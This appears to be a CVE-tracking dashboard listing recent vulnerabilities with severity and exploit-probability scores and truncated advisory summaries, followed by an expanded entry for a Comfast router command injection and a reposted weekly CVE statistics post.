## Updated at UTC 2026-04-29T04:41:37.207474

Access data as JSON

CVE CVSS EPSS Posts Repos Nuclei Updated Description
CVE-2026-6799 6.3 1.41% 1 0 2026-04-29T01:00:01.613000 A security flaw has been discovered in Comfast CF-N1-S 2.6.0.1. Affected by this
CVE-2026-7344 0 0.00% 2 0 2026-04-28T23:16:21.987000 Use after free in Accessibility in Google Chrome on Windows prior to 147.0.7727.
CVE-2026-7343 0 0.00% 2 0 2026-04-28T23:16:21.883000 Use after free in Views in Google Chrome on Windows prior to 147.0.7727.138 allo
CVE-2026-42167 8.1 0.00% 2 1 2026-04-28T23:16:20.610000 mod_sql in ProFTPD before 1.3.10rc1 allows remote attackers to execute arbitrary
CVE-2026-41873 9.8 0.00% 2 0 2026-04-28T22:16:49.900000 ** UNSUPPORTED WHEN ASSIGNED ** Inconsistent Interpretation of HTTP Requests ('H
CVE-2026-41649 7.7 0.00% 2 0 2026-04-28T22:16:49.747000 Outline is a service that allows for collaborative documentation. The `shares.cr
CVE-2026-38651 8.2 0.00% 2 0 2026-04-28T21:37:12 Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0.
CVE-2026-32202 4.3 0.09% 8 0 2026-04-28T21:37:03 Protection mechanism failure in Windows Shell allows an unauthorized attacker to
CVE-2026-24222 8.6 0.00% 4 0 2026-04-28T21:36:23 NVIDIA NeMoClaw contains a vulnerability in the sandbox environment initializati
CVE-2026-24231 6.3 0.00% 2 0 2026-04-28T21:36:22 NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF prote
CVE-2024-1708 8.5 53.66% 4 3 2026-04-28T21:34:00 ConnectWise ScreenConnect 23.9.7 and prior are affected by path-traversal vulner
CVE-2026-7289 8.8 0.00% 2 0 2026-04-28T20:25:44.987000 A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the func
CVE-2026-7288 8.8 0.00% 2 0 2026-04-28T20:25:44.987000 A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability aff
CVE-2026-7204 9.8 0.89% 3 0 2026-04-28T20:24:58.820000 A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. This iss
CVE-2026-7155 9.8 0.89% 2 0 2026-04-28T20:24:58.820000 A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005
CVE-2026-7154 9.8 0.89% 1 0 2026-04-28T20:24:58.820000 A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. This aff
CVE-2026-7244 9.8 0.89% 1 0 2026-04-28T20:24:20.377000 A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The
CVE-2026-7240 9.8 0.89% 1 0 2026-04-28T20:24:20.377000 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This vul
CVE-2026-3323 7.5 0.03% 2 0 2026-04-28T20:23:20.703000 An unsecured configuration interface on affected devices allows unauthenticated
CVE-2026-5944 8.2 0.00% 2 0 2026-04-28T20:23:20.703000 An improper access control vulnerability exists in the Cisco Intersight Device C
CVE-2026-7279 7.8 0.01% 2 0 2026-04-28T20:22:38.260000 AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowi
CVE-2025-67223 7.5 0.00% 2 1 2026-04-28T20:18:13.020000 The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk be
CVE-2026-27760 8.1 0.00% 2 0 2026-04-28T20:18:13.020000 OpenCATS prior to commit 3002a29 contains a PHP code injection vulnerability in
CVE-2026-32644 9.8 0.02% 2 0 2026-04-28T20:11:56.713000 Specific firmware versions of Milesight AIOT cameras use SSL certificates with d
CVE-2026-20766 8.8 0.04% 1 0 2026-04-28T20:11:56.713000 An out-of-bounds memory access vulnerability exists in specific firmware version
CVE-2026-40972 7.5 0.05% 1 0 2026-04-28T20:11:56.713000 An attacker on the same network as the remote application may be able to utilize
CVE-2026-7321 9.6 0.00% 2 0 2026-04-28T20:10:59.913000 Sandbox escape due to incorrect boundary conditions in the WebRTC: Networking co
CVE-2026-7320 7.5 0.00% 2 0 2026-04-28T20:10:59.913000 Information disclosure due to incorrect boundary conditions in the Audio/Video c
CVE-2026-24186 8.8 0.00% 4 0 2026-04-28T20:10:42.070000 NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause
CVE-2026-24178 9.8 0.00% 4 0 2026-04-28T20:10:42.070000 NVIDIA NVFlare Dashboard contains a vulnerability in the user management and aut
CVE-2026-24204 6.5 0.00% 2 0 2026-04-28T20:10:42.070000 NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Imprope
CVE-2026-3893 9.4 0.00% 2 0 2026-04-28T20:10:23.367000 The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing a
CVE-2026-41395 7.5 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.28 contains a webhook replay vulnerability in Plivo V3 si
CVE-2026-41404 8.8 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in
CVE-2026-41396 7.8 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_B
CVE-2026-41912 7.6 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vu
CVE-2026-41405 7.5 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performi
CVE-2026-42422 8.8 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.toke
CVE-2026-41914 8.5 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in
CVE-2026-42423 7.5 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that by
CVE-2026-42432 7.8 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing
CVE-2026-42431 8.1 0.00% 2 0 2026-04-28T20:10:23.367000 OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke
CVE-2026-6785 8.1 0.07% 1 0 2026-04-28T19:45:35.750000 Memory safety bugs present in Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird
CVE-2026-6786 8.1 0.06% 1 0 2026-04-28T19:45:26.663000 Memory safety bugs present in Firefox ESR 140.9, Thunderbird ESR 140.9, Firefox
CVE-2026-40453 9.9 0.21% 1 0 2026-04-28T19:43:55.047000 The fix for CVE-2025-27636 added setLowerCase(true) to HttpHeaderFilterStrategy
CVE-2026-40048 7.8 0.05% 1 0 2026-04-28T19:43:29.363000 The Camel-PQC FileBasedKeyLifecycleManager class deserializes the contents of `<
CVE-2026-33454 9.4 0.04% 1 0 2026-04-28T19:42:14.580000 The Camel-Mail component is vulnerable to Camel message header injection. The cu
CVE-2026-40022 8.2 0.06% 1 0 2026-04-28T19:41:41.530000 When authentication is enabled on the Apache Camel embedded HTTP server or embed
CVE-2026-3854 8.8 0.39% 40 3 2026-04-28T19:37:39.507000 An improper neutralization of special elements vulnerability was identified in G
CVE-2026-25874 9.8 0.06% 4 0 2026-04-28T19:01:40.377000 LeRobot through 0.5.1 contains an unsafe deserialization vulnerability in the as
CVE-2026-41364 8.1 0.12% 1 0 2026-04-28T18:45:44.107000 OpenClaw before 2026.3.31 contains a symlink following vulnerability in SSH sand
CVE-2026-41371 8.5 0.04% 1 0 2026-04-28T18:44:10.780000 OpenClaw before 2026.3.28 contains a privilege escalation vulnerability in chat.
CVE-2026-33277 8.8 0.23% 2 0 2026-04-28T18:43:10.593000 An OS command Injection issue exists in LogonTracer prior to v2.0.0. An arbitrar
CVE-2026-41602 7.5 0.02% 2 0 2026-04-28T18:40:25.530000 Integer Overflow or Wraparound vulnerability in Apache Thrift TFramedTransport G
CVE-2026-41472 6.1 0.67% 1 0 2026-04-28T18:31:36 CyberPanel versions prior to 2.4.4 contain a stored cross-site scripting vulnera
CVE-2026-42426 None 0.00% 2 0 2026-04-28T18:28:53 ## Impact OpenClaw `node.pair.approve` placed in `operator.write` scope instead
CVE-2026-41399 None 0.00% 2 0 2026-04-28T18:22:28 ## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket
CVE-2026-41394 None 0.00% 2 0 2026-04-28T18:20:50 ## Summary Unauthenticated plugin-auth HTTP routes receive operator runtime scop
CVE-2026-41387 9.7 0.00% 2 0 2026-04-28T18:18:46 ## Summary Host exec env override sanitization did not fail closed for several
CVE-2026-41386 None 0.00% 2 0 2026-04-28T18:18:23 ## Summary Bootstrap setup codes were not bound to the intended device role and
CVE-2026-41384 None 0.00% 2 0 2026-04-28T18:17:40 ## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable In
CVE-2026-41383 None 0.00% 2 0 2026-04-28T18:17:19 ## Summary Before OpenClaw 2026.4.2, the OpenShell mirror backend accepted arbi
CVE-2026-41378 None 0.00% 2 0 2026-04-28T18:15:32 ## Summary Paired node escalates to gateway RCE via unrestricted node.event agen
CVE-2026-7040 7.5 0.04% 1 0 2026-04-28T15:16:33.807000 Text::Minify::XS versions from v0.3.0 before v0.7.8 for Perl have a heap overflo
CVE-2026-35431 10.0 0.07% 2 0 2026-04-28T12:10:53.103000 Server-side request forgery (ssrf) in Microsoft Entra ID Entitlement Management
CVE-2026-7243 9.8 0.89% 1 0 2026-04-28T09:34:20 A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe
CVE-2026-7248 9.8 0.06% 1 0 2026-04-28T09:34:20 A vulnerability was found in D-Link DI-8100 16.07.26A1. This affects the functio
CVE-2026-5201 7.5 0.09% 1 1 2026-04-28T09:16:17.017000 A flaw was found in the gdk-pixbuf library. This heap-based buffer overflow vuln
CVE-2026-7202 9.8 0.89% 2 0 2026-04-28T03:31:36 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This aff
CVE-2026-7203 9.8 0.89% 2 0 2026-04-28T03:31:36 A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. This vulnerab
CVE-2026-27785 8.8 0.01% 1 0 2026-04-28T00:31:47 Specific firmware versions of Milesight AIOT camera firmware contain hard-coded
CVE-2026-40976 9.1 0.04% 1 0 2026-04-28T00:31:47 In certain circumstances, Spring Boot's default web security is ineffective allo
CVE-2026-7160 8.8 0.29% 1 0 2026-04-28T00:31:47 A vulnerability was determined in Tenda HG3 2.0. This vulnerability affects the
CVE-2026-7156 9.8 0.89% 2 0 2026-04-27T21:31:12 A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. Affected i
CVE-2026-7151 8.8 0.05% 1 0 2026-04-27T21:31:12 A vulnerability was determined in Tenda HG3 2.0. Impacted is the function formUp
CVE-2026-7153 9.8 0.89% 1 0 2026-04-27T21:31:12 A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. The
CVE-2026-30350 7.5 0.01% 1 0 2026-04-27T21:31:02 An issue in the /store/items/search endpoint of Agent Protocol server commit e9a
CVE-2026-31662 7.5 0.05% 1 0 2026-04-27T21:30:50 In the Linux kernel, the following vulnerability has been resolved: tipc: fix b
CVE-2026-6741 8.8 0.05% 1 0 2026-04-27T20:21:52.070000 The LatePoint – Calendar Booking Plugin for Appointments and Events plugin for W
CVE-2026-7152 9.8 0.89% 1 0 2026-04-27T20:21:52.070000 A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. The affe
CVE-2026-31637 9.8 0.05% 1 0 2026-04-27T20:20:48.030000 In the Linux kernel, the following vulnerability has been resolved: rxrpc: reje
CVE-2026-31659 9.8 0.05% 1 0 2026-04-27T20:17:17.613000 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31657 9.8 0.06% 1 0 2026-04-27T20:16:58.960000 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-31656 7.8 0.01% 1 0 2026-04-27T20:16:43.370000 In the Linux kernel, the following vulnerability has been resolved: drm/i915/gt
CVE-2026-31652 7.8 0.01% 1 0 2026-04-27T20:16:12.663000 In the Linux kernel, the following vulnerability has been resolved: mm/damon/st
CVE-2026-31650 7.8 0.01% 1 0 2026-04-27T20:14:35.180000 In the Linux kernel, the following vulnerability has been resolved: mmc: vub300
CVE-2026-31649 9.8 0.05% 1 0 2026-04-27T20:13:49.587000 In the Linux kernel, the following vulnerability has been resolved: net: stmmac
CVE-2026-31648 7.8 0.01% 1 0 2026-04-27T20:13:14.333000 In the Linux kernel, the following vulnerability has been resolved: mm: filemap
CVE-2026-31669 9.8 0.07% 1 0 2026-04-27T20:09:25.553000 In the Linux kernel, the following vulnerability has been resolved: mptcp: fix
CVE-2026-31668 9.8 0.05% 1 0 2026-04-27T20:08:54.307000 In the Linux kernel, the following vulnerability has been resolved: seg6: separ
CVE-2026-31667 7.8 0.01% 1 0 2026-04-27T20:00:40.187000 In the Linux kernel, the following vulnerability has been resolved: Input: uinp
CVE-2026-31666 7.8 0.01% 1 0 2026-04-27T20:00:27.157000 In the Linux kernel, the following vulnerability has been resolved: btrfs: fix
CVE-2026-31665 7.8 0.01% 1 0 2026-04-27T20:00:05.430000 In the Linux kernel, the following vulnerability has been resolved: netfilter:
CVE-2026-40372 9.1 0.03% 2 0 2026-04-27T19:57:39.360000 Improper verification of cryptographic signature in ASP.NET Core allows an unaut
CVE-2026-42039 7.5 0.04% 1 0 2026-04-27T19:50:46.320000 Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.
CVE-2026-30352 9.8 0.27% 1 0 2026-04-27T19:18:46.690000 A remote code execution (RCE) vulnerability in the /devserver/start endpoint of
CVE-2026-41635 9.8 0.05% 2 0 2026-04-27T18:57:20.293000 Apache MINA's AbstractIoBuffer.resolveClass() contains two branches, one of them
CVE-2026-5942 5.5 0.01% 1 0 2026-04-27T18:57:20.293000 Flaws in page lifecycle management allow document structure changes to desynchro
CVE-2026-41409 9.8 0.05% 2 0 2026-04-27T18:57:20.293000 The fix for CVE-2024-52046 in Apache MINA AbstractIoBuffer.getObject() was incom
CVE-2026-3008 6.6 0.01% 1 3 2026-04-27T18:57:20.293000 Successful exploitation of the string injection vulnerability could allow an att
CVE-2025-69689 8.8 0.01% 1 0 2026-04-27T18:57:20.293000 The Fan Control application V251 contains an improper privilege handling vulnera
CVE-2026-7100 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A flaw has been found in Tenda F456 1.0.0.5. The impacted element is the functio
CVE-2026-7099 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A vulnerability was detected in Tenda F456 1.0.0.5. The affected element is the
CVE-2026-5943 7.8 0.01% 1 0 2026-04-27T18:57:20.293000 Document structural anomalies caused inconsistencies between page element relati
CVE-2026-5940 7.8 0.01% 1 0 2026-04-27T18:57:20.293000 Calling a function that triggers a UI refresh after removing comments via a scri
CVE-2026-7119 8.8 0.29% 1 0 2026-04-27T18:57:20.293000 A vulnerability was detected in Tenda HG3 2.0. The impacted element is an unknow
CVE-2026-7098 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A security vulnerability has been detected in Tenda F456 1.0.0.5. Impacted is th
CVE-2026-7080 8.8 0.05% 2 0 2026-04-27T18:57:20.293000 A security vulnerability has been detected in Tenda F456 1.0.0.5. This impacts t
CVE-2026-3868 0 0.09% 1 0 2026-04-27T18:57:20.293000 An improper handling of the length parameter inconsistency vulnerability has bee
CVE-2026-7081 8.8 0.05% 2 0 2026-04-27T18:57:20.293000 A vulnerability was detected in Tenda F456 1.0.0.5. Affected is the function fro
CVE-2026-7078 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A security flaw has been discovered in Tenda F456 1.0.0.5. The impacted element
CVE-2026-42363 9.3 0.03% 2 0 2026-04-27T18:57:20.293000 An insufficient encryption vulnerability exists in the Device Authentication fun
CVE-2026-7055 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A security vulnerability has been detected in Tenda F456 1.0.0.5. This issue aff
CVE-2026-7057 8.8 0.05% 1 0 2026-04-27T18:57:20.293000 A flaw has been found in Tenda F456 1.0.0.5. The affected element is an unknown
CVE-2026-7106 8.8 0.05% 1 0 2026-04-27T18:38:48.527000 The Highland Software Custom Role Manager plugin for WordPress is vulnerable to
CVE-2026-22337 9.8 0.04% 1 0 2026-04-27T18:37:59.213000 Incorrect Privilege Assignment vulnerability in Directorist Directorist Social L
CVE-2026-7124 9.8 0.89% 1 0 2026-04-27T18:36:42.937000 A vulnerability was determined in Totolink A8000RU 7.1cu.643_b20200521. Affected
CVE-2026-7123 9.8 0.89% 1 0 2026-04-27T18:36:42.937000 A vulnerability was found in Totolink A8000RU 7.1cu.643_b20200521. Affected is t
CVE-2026-41463 8.8 0.42% 1 0 2026-04-27T18:36:19.637000 ProjeQtor versions 7.0 through 12.4.3 contain a ZipSlip path traversal vulnerabi
CVE-2026-41462 9.8 0.09% 1 1 2026-04-27T18:36:19.637000 ProjeQtor versions 7.0 through 12.4.3 contain an unauthenticated SQL injection v
CVE-2026-7137 9.8 0.89% 2 0 2026-04-27T18:35:53.583000 A security vulnerability has been detected in Totolink A8000RU 7.1cu.643_b202005
CVE-2026-7139 9.8 0.89% 1 0 2026-04-27T18:35:53.583000 A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This issue affect
CVE-2026-7138 9.8 0.89% 1 0 2026-04-27T18:35:53.583000 A vulnerability was detected in Totolink A8000RU 7.1cu.643_b20200521. This vulne
CVE-2026-31673 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: af_unix: re
CVE-2026-31682 9.1 0.07% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: bridge: br_
CVE-2026-31680 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: net: ipv6:
CVE-2026-31678 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: openvswitch
CVE-2026-31676 7.5 0.04% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: rxrpc: only
CVE-2026-31675 7.8 0.01% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: net/sched:
CVE-2026-31685 9.4 0.05% 1 0 2026-04-27T18:32:22.917000 In the Linux kernel, the following vulnerability has been resolved: netfilter:
CVE-2026-38934 8.8 0.02% 2 1 2026-04-27T18:32:15 Cross Site Request Forgery vulnerability in diskoverdata diskover-community v.2.
CVE-2026-7140 9.8 0.89% 2 0 2026-04-27T18:32:15 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. Impacted
CVE-2026-7136 9.8 0.89% 1 0 2026-04-27T18:32:15 A weakness has been identified in Totolink A8000RU 7.1cu.643_b20200521. Affected
CVE-2026-30351 7.5 0.01% 1 0 2026-04-27T18:32:07 A path traversal vulnerability in the UI/static component of leonvanzyl autocode
CVE-2026-40860 9.8 0.39% 2 0 2026-04-27T18:32:05 JmsBinding.extractBodyFromJms() in camel-jms, and the equivalent JmsBinding clas
CVE-2026-41176 9.8 6.30% 1 0 template 2026-04-27T18:19:45.303000 Rclone is a command-line program to sync files and directories to and from diffe
CVE-2026-38834 7.3 13.21% 1 0 2026-04-27T16:44:38.997000 Tenda W30E V2.0 V16.01.0.21 was found to contain a command injection vulnerabili
CVE-2026-40858 8.8 0.08% 2 1 2026-04-27T15:31:59 The camel-infinispan component's ProtoStream-based remote aggregation repository
CVE-2026-33453 10.0 0.51% 1 1 2026-04-27T15:31:59 Improperly Controlled Modification of Dynamically-Determined Object Attributes v
CVE-2026-31663 7.8 0.01% 1 0 2026-04-27T15:31:55 In the Linux kernel, the following vulnerability has been resolved: xfrm: hold
CVE-2026-7125 9.8 0.89% 1 0 2026-04-27T15:31:00 A vulnerability was identified in Totolink A8000RU 7.1cu.643_b20200521. Affected
CVE-2026-31683 7.8 0.01% 1 0 2026-04-27T15:30:52 In the Linux kernel, the following vulnerability has been resolved: batman-adv:
CVE-2026-40473 8.8 0.08% 2 1 2026-04-27T15:30:52 The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter
CVE-2026-7121 9.8 0.89% 1 0 2026-04-27T12:30:49 A flaw has been found in Totolink A8000RU 7.1cu.643_b20200521. This affects the
CVE-2026-7122 9.8 0.89% 1 0 2026-04-27T12:30:49 A vulnerability has been found in Totolink A8000RU 7.1cu.643_b20200521. This imp
CVE-2026-5941 7.8 0.02% 1 0 2026-04-27T12:30:45 Parsing logic flaws cause non-signature data to be misidentified as valid signat
CVE-2026-22336 9.3 0.03% 1 0 2026-04-27T12:30:44 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti
CVE-2026-7101 8.8 0.05% 1 0 2026-04-27T09:34:46 A vulnerability has been found in Tenda F456 1.0.0.5. This affects the function
CVE-2026-42379 7.7 0.03% 1 0 2026-04-27T09:34:46 Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper T
CVE-2026-7097 8.8 0.05% 1 0 2026-04-27T09:34:46 A weakness has been identified in Tenda F456 1.0.0.5. This issue affects the fun
CVE-2026-7096 8.8 0.29% 1 0 2026-04-27T09:34:46 A security flaw has been discovered in Tenda HG3 2.0 300003070. This vulnerabili
CVE-2026-7082 8.8 0.05% 2 0 2026-04-27T06:31:33 A flaw has been found in Tenda F456 1.0.0.5. Affected by this vulnerability is t
CVE-2026-7079 8.8 0.05% 1 0 2026-04-27T03:30:34 A weakness has been identified in Tenda F456 1.0.0.5. This affects the function
CVE-2026-7069 8.0 0.03% 1 0 2026-04-27T00:30:33 A security flaw has been discovered in D-Link DIR-825 up to 3.00b32. This impact
CVE-2026-7068 8.8 0.03% 1 0 2026-04-27T00:30:33 A vulnerability was identified in D-Link DIR-825 3.00b32. This affects the funct
CVE-2026-7056 8.8 0.09% 1 0 2026-04-27T00:30:33 A vulnerability was detected in Tenda F456 1.0.0.5. Impacted is the function fro
CVE-2026-7054 8.8 0.05% 1 0 2026-04-27T00:30:33 A weakness has been identified in Tenda F456 1.0.0.5. This vulnerability affects
CVE-2026-7053 8.8 0.05% 1 0 2026-04-27T00:30:33 A security flaw has been discovered in Tenda F456 1.0.0.5. This affects the func
CVE-2026-7037 9.8 0.89% 1 0 2026-04-26T12:31:47 A security flaw has been discovered in Totolink A8000RU 7.1cu.643_b20200521. Thi
CVE-2026-24467 9.0 0.90% 1 0 2026-04-25T18:00:57.917000 OpenAEV is an open source platform allowing organizations to plan, schedule and
CVE-2026-40887 9.1 5.38% 1 0 template 2026-04-24T21:10:19 ## Summary An unauthenticated SQL injection vulnerability exists in the Vendure
CVE-2026-41651 8.8 0.20% 4 5 2026-04-24T13:43:37.347000 PackageKit is a a D-Bus abstraction layer that allows the user to manage package
CVE-2026-5450 9.8 0.05% 2 0 2026-04-23T18:32:57 Calling the scanf family of functions with a %mc (malloc'd character match) in t
CVE-2026-3844 9.8 0.06% 2 4 2026-04-23T14:28:55.557000 The Breeze Cache plugin for WordPress is vulnerable to arbitrary file uploads du
CVE-2026-33626 7.5 0.04% 2 0 2026-04-23T13:39:54.420000 LMDeploy is a toolkit for compressing, deploying, and serving large language mod
CVE-2026-41179 None 8.21% 1 0 template 2026-04-23T10:52:57 ### Summary The RC endpoint `operations/fsinfo` is exposed without `AuthRequired
CVE-2026-21571 0 1.17% 1 0 2026-04-22T21:24:26.997000 This Critical severity OS Command Injection vulnerability was introduced in vers
CVE-2026-22007 2.9 0.02% 1 0 2026-04-22T15:31:39 Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Ente
CVE-2026-6770 6.5 0.06% 2 1 2026-04-22T15:07:23.650000 Other issue in the Storage: IndexedDB component. This vulnerability was fixed in
CVE-2019-25714 None 0.78% 1 0 2026-04-21T18:32:04 Seeyon OA A8 contains an unauthenticated arbitrary file write vulnerability in t
CVE-2026-5965 9.8 8.66% 1 0 2026-04-21T06:30:32 NewSoftOA developed by NewSoft has an OS Command Injection vulnerability, allowi
CVE-2026-35177 4.1 0.01% 1 0 2026-04-20T18:28:03.593000 Vim is an open source, command line text editor. Prior to 9.2.0280, a path trave
CVE-2026-4747 8.8 0.09% 1 2 2026-04-20T13:47:31.163000 Each RPCSEC_GSS data packet is validated by a routine which checks a signature i
CVE-2025-61260 9.8 0.10% 2 0 2026-04-17T15:24:57.753000 A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enabl
CVE-2026-20148 4.9 0.06% 2 0 2026-04-17T15:09:46.880000 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2026-20147 9.9 0.28% 2 0 2026-04-17T15:09:46.880000 A vulnerability in Cisco ISE and Cisco ISE-PIC could allow an authenticated, rem
CVE-2026-5588 None 0.01% 2 0 2026-04-16T21:32:20 : Use of a Broken or Risky Cryptographic Algorithm vulnerability in Legion of th
CVE-2025-29787 0 0.33% 2 0 2026-04-15T00:35:42.020000 `zip` is a zip library for rust which supports reading and writing of simple ZIP
CVE-2026-35414 4.2 0.02% 2 1 2026-04-02T18:31:50 OpenSSH before 10.3 mishandles the authorized_keys principals option in uncommon
CVE-2026-32062 7.5 0.14% 1 0 2026-03-11T20:38:31 ### Summary `@openclaw/voice-call` (and the bundled copy shipped in `openclaw`)
CVE-2026-2526 6.3 0.38% 1 0 2026-02-18T21:31:21 A vulnerability was found in Wavlink WL-WN579A3 up to 20210219. This impacts the
CVE-2026-21509 7.8 10.86% 1 12 2026-02-11T15:40:33.473000 Reliance on untrusted inputs in a security decision in Microsoft Office allows a
CVE-2025-12383 None 0.04% 2 0 2026-02-05T15:43:37 In Eclipse Jersey versions 2.45, 3.0.16, 3.1.9 a race condition can cause ignori
CVE-2025-68161 4.8 0.03% 2 0 2026-01-20T01:15:55.067000 The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does
CVE-2025-68705 None 0.04% 2 1 2026-01-07T21:34:38 # RustFS Path Traversal Vulnerability ## Vulnerability Details - **CVE ID**:
CVE-2025-59250 8.1 0.08% 2 0 2025-11-24T17:38:57 Improper input validation in JDBC Driver for SQL Server allows an unauthorized a
CVE-2025-20362 6.5 43.64% 1 0 template 2025-11-06T14:51:19.950000 Update: On November 5, 2025, Cisco became aware of a new attack variant against
CVE-2025-48924 5.3 0.04% 2 1 2025-11-04T22:16:17.823000 Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects
CVE-2025-20333 9.9 24.78% 1 0 2025-10-28T13:58:58.610000 A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security
CVE-2025-59536 8.8 0.03% 2 4 2025-10-23T12:46:37.910000 Claude Code is an agentic coding tool. Versions before 1.0.111 were vulnerable t
CVE-2024-21413 9.8 92.99% 1 35 2025-10-22T00:33:00 Microsoft Outlook Remote Code Execution Vulnerability
CVE-2025-54136 7.2 0.11% 2 1 2025-08-25T01:41:36.580000 Cursor is a code editor built for programming with AI. In versions 1.2.4 and bel
CVE-2025-27636 5.6 35.52% 1 3 2025-06-23T18:54:52.400000 Bypass/Injection vulnerability in Apache Camel components under particular condi
CVE-2024-52046 9.8 80.14% 1 0 2025-02-11T19:03:55 The `ObjectSerializationDecoder` in Apache MINA uses Java’s native deserializati
CVE-2022-24138 7.8 0.28% 1 0 2024-11-21T06:49:53.140000 IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download
CVE-2026-42208 0 0.00% 2 1 N/A
CVE-2026-25262 0 0.00% 1 0 N/A

CVE-2026-6799
(6.3 MEDIUM)

EPSS: 1.41%

updated 2026-04-29T01:00:01.613000

1 posts

A security flaw has been discovered in Comfast CF-N1-S 2.6.0.1. Affected by this issue is some unknown functionality of the file /cgi-bin/mbox-config?method=SET&section=ping_config of the component Endpoint. Performing a manipulation of the argument destination results in command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attack

secdb@infosec.exchange at 2026-04-27T00:01:17.000Z ##

📈 CVE Published in last 7 days (2026-04-20 - 2026-04-27)
See more at secdb.nttzen.cloud/dashboard

Total CVEs: 1459

Severity:
- Critical: 124
- High: 358
- Medium: 586
- Low: 70
- None: 321

Status:
- : 40
- Analyzed: 313
- Awaiting Analysis: 570
- Deferred: 238
- Modified: 9
- Received: 124
- Rejected: 23
- Undergoing Analysis: 142

Top CNAs:
- GitHub, Inc.: 326
- kernel.org: 257
- VulnCheck: 119
- VulDB: 114
- Oracle: 102
- MITRE: 69
- Wordfence: 67
- Canonical Ltd.: 46
- Mozilla Corporation: 42
- N/A: 40

Top Affected Products:
- UNKNOWN: 1040
- Openclaw: 42
- Mozilla Firefox: 39
- Mozilla Thunderbird: 38
- Oracle Mysql Server: 25
- Wwbn Avideo: 18
- Flowiseai Flowise: 18
- Uutils Coreutils: 14
- Silextechnology Sd-330ac Firmware: 11
- Gitlab: 11

Top EPSS Score:
- CVE-2026-5965 - 6.34 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41179 - 5.98 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-40887 - 4.56 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-38834 - 3.22 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41176 - 2.79 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-21571 - 1.10 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-6799 - 1.06 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-24467 - 0.76 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2026-41472 - 0.67 % (secdb.nttzen.cloud/cve/detail/)
- CVE-2019-25714 - 0.60 % (secdb.nttzen.cloud/cve/detail/)

##

CVE-2026-7344
(0 None)

EPSS: 0.00%

updated 2026-04-28T23:16:21.987000

2 posts

